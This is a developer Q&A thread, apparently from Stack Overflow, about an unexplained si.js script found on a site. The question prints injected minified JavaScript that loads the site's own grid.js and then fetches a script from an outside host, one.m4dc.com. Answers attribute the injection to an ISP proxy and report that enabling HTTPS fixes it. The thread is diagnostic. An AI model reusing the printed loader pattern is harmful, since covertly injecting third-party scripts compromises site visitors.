# Unidentifiable JS script in my project

Tags: javascript, web-inspector

I was inspecting a slow loading page and found this si.js in the inspect network section of chrome. Could someone help me to understand what it is. I searched the grid.js and could not found any link to this si.js. ( On close check, I could see that the page is redirecting to another website "http://one.m4dc.com/j/si.js". Appreciate your help
Here are the screenshots
[image]

[image]

Update!
If  you go the to the browser url this is what I get ../js/grid.js

`try{var esdmd51='1f4c5553ab20a8809f7f1724448c2f6e'; var d=document;var esdfd5_uri='http://test.domain.com/js/grid.js?m4dc56=156443';if(0!=e6f744){var e6f744=0;esdfd5=!0}else esdfd5=!1;function ldS(e,t){var a=d.createElement("script");a.type="text/javascript",a.readyState?a.onreadystatechange=function(){"loaded"!=a.readyState&&"complete"!=a.readyState||(a.onreadystatechange=null,t())}:a.onload=function(){t()},a.src=e,d.getElementsByTagName("head")[0].appendChild(a)}try{vA=d.currentScript.async,vD=d.currentScript.defer}catch(e){vA=!0}vA||vD?ldS(esdfd5_uri,function(){}):(d.write('<script id="esdfd556443" type="text/javascript" src="'+esdfd5_uri+'" ><\/script>'),d.getElementById("esdfd556443")||ldS(sdfd5_uri,function(){})),esdfd5&&ldS("http://one.m4dc.com/j/si.js",function(){})}catch(e){`}

But actual script ( On local machine is similar to one in the original website)

https://tympanus.net/Tutorials/ThumbnailGridExpandingPreview/js/grid.js

Comment: What Script loads this JS File?

Comment: Not sure. I checked all the documents. The grid.js is an image gallery script. Previously this si.js link was related to another js file eform.js ( I thought , that could be the issue and removed eform.js) Once it is removed, the script is now linked with grid.js

Comment: Have you looked at the script? Can you guess what it does?

Comment: Who developed the website?

Comment: @Luca am not an expert in .js  but was inspecting, why the page is loading slower

Comment: @MargaretBloom I developed the website. Also you can see there are  2 grid.js in the inspect element.

Comment: Any solution for this ? or how the js is being added ?

Answer (score 4):

I am too experiencing the same issue .i just found out that this script http://one.m4dc.com/j/si.js adding cookies to my website
[image]

The problem was actually resolved when i added ssl certificate to my website.I found out that the server http://one.m4dc.com was owned by

> Bharthi airtel [one.m4dc.com ip location info](https://i.stack.imgur.com/R5Z0d.png)

and i was using their broadband services.Its looks like their proxy server was injecting this script.They are using this script for malicious purposes.

Comment: Me too facing this issue, Is there any specific reason why they are doing it? And possible solution?

Comment: using an SSL certificate rectified my issue

Answer (score 2):

This might be of help to some one if you face a similar issue.

I had a similar issue, some unknown js files being injected into my site. I was able to identify the source using Chrome Developers Tools.

[image: chrome screenshot]

Look for the initiator column in the corresponding injected JS file row. It will point to the corrupted/altered JS file. For me it has occurred multiple time, not sure of the exact cause. Since my system is clean of Malware or Adware. But the issue gets resolved when replacing the corrupted JS with fresh copy or better to go with CDN if its a library.